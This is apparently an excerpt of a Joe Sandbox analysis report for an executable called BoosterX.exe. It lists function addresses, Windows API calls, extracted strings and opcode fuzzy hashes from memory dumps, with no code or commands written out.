                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                    • String ID: Thread pool initialization failed.
                                                    • API String ID: 3340455307-2182114853
                                                    • Opcode ID: b988014fa09f69f29488cf01db4975baa26b0601a0ec9a12dcfa548a4564653f
                                                    • Instruction ID: ea5c9c0a6312540dc6a2109fd10c06321fb381b7b965bcf0f057b7678d93f34e
                                                    • Opcode Fuzzy Hash: b988014fa09f69f29488cf01db4975baa26b0601a0ec9a12dcfa548a4564653f
                                                    • Instruction Fuzzy Hash: 3221A232A1964396F7108F24E4547AD32A1FB98B0EF188035CA8DCB395CF7E945A8B84
                                                    Function 00007FF6C0378560 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CapsDeviceRelease
                                                    • String ID:
                                                    • API String ID: 127614599-3916222277
                                                    • Opcode ID: a495d1c106870e0f0321fa1e920729909cda6ce65bb071f3320cbe7ab8d646f7
                                                    • Instruction ID: a95344d8d5066d0aa815e89dfcdf331b89c40bbc4075cdffbabb267147bfde83
                                                    • Opcode Fuzzy Hash: a495d1c106870e0f0321fa1e920729909cda6ce65bb071f3320cbe7ab8d646f7
                                                    • Instruction Fuzzy Hash: 48E0C220B08A4292FB086BBAF58A03A2261AB4CBD2F158435DA5FC77D4CF3CC4C54300
                                                    Function 00007FF6C035D1B8 Relevance: 6.2, APIs: 4, Instructions: 238timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                    • String ID:
                                                    • API String ID: 1137671866-0
                                                    • Opcode ID: 634f0027529a39f2956737d7ffa65a829bc6c39c8b9bd9b086ee47eb9c2cc145
                                                    • Instruction ID: 3fd5e4b724083df5e2e5cc0c5c02b19104240b703b6e604590590f7a0cdaf825
                                                    • Opcode Fuzzy Hash: 634f0027529a39f2956737d7ffa65a829bc6c39c8b9bd9b086ee47eb9c2cc145
                                                    • Instruction Fuzzy Hash: FAA1CF66A18A83A2EE20DF65E8441BD7361FB85785F400632EACDC7BA9DF3CE544C700
                                                    Function 00007FF6C03704C8 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: 4d6045c8b408e668fa1133d078708eca6aecce9a2eefd03080f568449f648bad
                                                    • Instruction ID: 3c2c4b37c3a08220621b3e61f2ffb6bd22b9103f07a78f13c83b4d1f5743e8c8
                                                    • Opcode Fuzzy Hash: 4d6045c8b408e668fa1133d078708eca6aecce9a2eefd03080f568449f648bad
                                                    • Instruction Fuzzy Hash: CC519E62B14A43A9FB009F69D4552FC2361EB85B99F504236DA9CD7BAAEF2CD240C344
                                                    Function 00007FF6C0379D10 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                    • String ID:
                                                    • API String ID: 1077098981-0
                                                    • Opcode ID: 636cda63db5f50613c70694827d2b71a51838dc95d214f096266c0c3ed1ab69a
                                                    • Instruction ID: bbd5a56244b2bd74c7ff5cdaff58f420d4d44ab5b231fabe6f53435266873116
                                                    • Opcode Fuzzy Hash: 636cda63db5f50613c70694827d2b71a51838dc95d214f096266c0c3ed1ab69a
                                                    • Instruction Fuzzy Hash: FA515B32A18B43E6EB508F65E5447AE67A4FB85B86F500136EA8ED7B54DF3CD504CB00
                                                    Function 00007FF6C038DADC Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                    • String ID:
                                                    • API String ID: 4141327611-0
                                                    • Opcode ID: a98e5aeb67f48d2f6f979bd70fbe768edfa1404fbf159e78b91cdf96afedf3b8
                                                    • Instruction ID: 0b36527c0e5d9fbc4fe290b5507e6340c71eb9f0542de6fe2968e320a26ab386
                                                    • Opcode Fuzzy Hash: a98e5aeb67f48d2f6f979bd70fbe768edfa1404fbf159e78b91cdf96afedf3b8
                                                    • Instruction Fuzzy Hash: CB417E71A0868366FF679F119044379A3A1EF90BA2F1542B3DACDC7B95DF2CE9418700
                                                    Function 00007FF6C0363940 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3823481717-0
                                                    • Opcode ID: 4230d5988ea448787440b68bfd073e70abe7b21d56b24157a801639cdcef97c4
                                                    • Instruction ID: 82cff2c48c9a2027e445cd2c746b50e91e44cc6f30daac91f196ab006f1cc9e2
                                                    • Opcode Fuzzy Hash: 4230d5988ea448787440b68bfd073e70abe7b21d56b24157a801639cdcef97c4
                                                    • Instruction Fuzzy Hash: 9441AE62F14B53A4FB00CFB9E8851AC2372BB45BA9B101235DE9DEBB99DF78D045C240
                                                    Function 00007FF6C0363644 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2359106489-0
                                                    • Opcode ID: 27821a6842deb0aeb1942545e4d2e9236c0873fc3613091ef6fa8cf2280b892d
                                                    • Instruction ID: a2bb24b7eca653a7bf8d6e29ad122b41815f9151d9e55aec91fdccfe698a8960
                                                    • Opcode Fuzzy Hash: 27821a6842deb0aeb1942545e4d2e9236c0873fc3613091ef6fa8cf2280b892d
                                                    • Instruction Fuzzy Hash: FD31C062A0C683A1EA609F29A58527962A1FF897A2F540231EEDDCB7D5DF3CE4458600
                                                    Function 00007FF6C0390AF8 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6C038C3DB), ref: 00007FF6C0390B11
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6C038C3DB), ref: 00007FF6C0390B73
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6C038C3DB), ref: 00007FF6C0390BAD
                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6C038C3DB), ref: 00007FF6C0390BD7
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                    • String ID:
                                                    • API String ID: 1557788787-0
                                                    • Opcode ID: 57e6a8c8eb3660c1ef58ab29e04114fb274abfae31478a384663a9e2e76f5968
                                                    • Instruction ID: 9be77dcfa3922df6f20d2711c5f9f06a303fccdad859aec3c791344fc8ed5bc3
                                                    • Opcode Fuzzy Hash: 57e6a8c8eb3660c1ef58ab29e04114fb274abfae31478a384663a9e2e76f5968
                                                    • Instruction Fuzzy Hash: 11218231F19B9395EA209F16A440029B7A4FB98FD5B084635DECEE3B98DF3CE4528300
                                                    Function 00007FF6C038D3C0 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$abort
                                                    • String ID:
                                                    • API String ID: 1447195878-0
                                                    • Opcode ID: 66754dd10562acfe9150f83282709bfe11e0b7c2362ae99d4c12b657f2a22dea
                                                    • Instruction ID: f3eab3000b98bab5b1156451e491ec1e78b651a64154677f5747f117d7b02282
                                                    • Opcode Fuzzy Hash: 66754dd10562acfe9150f83282709bfe11e0b7c2362ae99d4c12b657f2a22dea
                                                    • Instruction Fuzzy Hash: 16019E10B0920362FE5A6F32A65957812925F84792F1406BBD9DEC37DAEF3CF8458200
                                                    Function 00007FF6C0378510 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: 659ac7cef5a6230f511b131fe25ef100f867fa9a2810ce63495c253f9cdf3390
                                                    • Instruction ID: 47acd2aa2de45ce1555090a8175dcba6426ffbda096cff3bd810b05a232a4a1f
                                                    • Opcode Fuzzy Hash: 659ac7cef5a6230f511b131fe25ef100f867fa9a2810ce63495c253f9cdf3390
                                                    • Instruction Fuzzy Hash: EEE0ED60E09A0792FF186F7AA8591352151AF48747F084839C85EC6390DF3CE1858610
                                                    Function 00007FF6C035E35C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID: DXGIDebug.dll
                                                    • API String ID: 3668304517-540382549
                                                    • Opcode ID: 52200f55740db99051fc736a5c90be683e68ee55df2891b50c708b4d95f4332b
                                                    • Instruction ID: b389ef9832a09b03fbb480cef821eddfe11accc8f006fb0b70505a0a00592165
                                                    • Opcode Fuzzy Hash: 52200f55740db99051fc736a5c90be683e68ee55df2891b50c708b4d95f4332b
                                                    • Instruction Fuzzy Hash: B871AC72A14B82A6EB14CF25E8443ADB3A5FB54B94F144226DFAC87BA5DF38D061C304
                                                    Function 00007FF6C038E174 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: e+000$gfff
                                                    • API String ID: 3215553584-3030954782
                                                    • Opcode ID: f19aa8e360a5519298b9773b70f05fda243e234b3046621750ac1af24fd8595b
                                                    • Instruction ID: 31082d90bf88a50226712f85a7eb291cf84dd522759b9a67c2c321d63f6c1b6e
                                                    • Opcode Fuzzy Hash: f19aa8e360a5519298b9773b70f05fda243e234b3046621750ac1af24fd8595b
                                                    • Instruction Fuzzy Hash: B5510662B187C6A6E7259F3599413696A95EB81B91F0883B3C7DCCBBD6CF2CE444C700
                                                    Function 00007FF6C03693C8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                    • String ID: SIZE
                                                    • API String ID: 449872665-3243624926
                                                    • Opcode ID: 242355a89709c4c5ea07838de1a7176d1d05b675bc8fc1010d8238fae86b5ddf
                                                    • Instruction ID: 42a1881ead331dcf45f3216f5fa82a0836626dadade6e9dff78d41d88c42b5a8
                                                    • Opcode Fuzzy Hash: 242355a89709c4c5ea07838de1a7176d1d05b675bc8fc1010d8238fae86b5ddf
                                                    • Instruction Fuzzy Hash: 4E418062A28683A5EE11DF28E4453B96361BB867A2F504233EBDDC67D6EF3CD541C700
                                                    Function 00007FF6C038C240 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe, xrefs: 00007FF6C038C279
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FileModuleName_invalid_parameter_noinfo
                                                    • String ID: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe
                                                    • API String ID: 3307058713-3092362476
                                                    • Opcode ID: a0d8c3237379257ab40db39896a4593fde12318382e3262d4c43878eda6e4b0c
                                                    • Instruction ID: 9fef889c85ff7d83660706b54e362ba85f4df73ecac6c12b732f66b30140c815
                                                    • Opcode Fuzzy Hash: a0d8c3237379257ab40db39896a4593fde12318382e3262d4c43878eda6e4b0c
                                                    • Instruction Fuzzy Hash: 7841AC32A18A53AAEB15DF21A8401BC7794EF85BD5F548277EA8DC7B85DF3CE4428300
                                                    Function 00007FF6C0379AC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ItemText$DialogWindow
                                                    • String ID: ASKNEXTVOL
                                                    • API String ID: 445417207-3402441367
                                                    • Opcode ID: ea63e8dc08ff62e6733d286245d57d075c34d51a0c1fdd9564288bf9b5656a5d
                                                    • Instruction ID: ebe62fc9992149c764212bb5363855d9f0d3d418445d7c2e3c8316fadb82d221
                                                    • Opcode Fuzzy Hash: ea63e8dc08ff62e6733d286245d57d075c34d51a0c1fdd9564288bf9b5656a5d
                                                    • Instruction Fuzzy Hash: D241C222B1CA83A1FA109F1AE5842B923A1EF89BC6F540136DECDD77A5CF3CE5418340
                                                    Function 00007FF6C03695F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
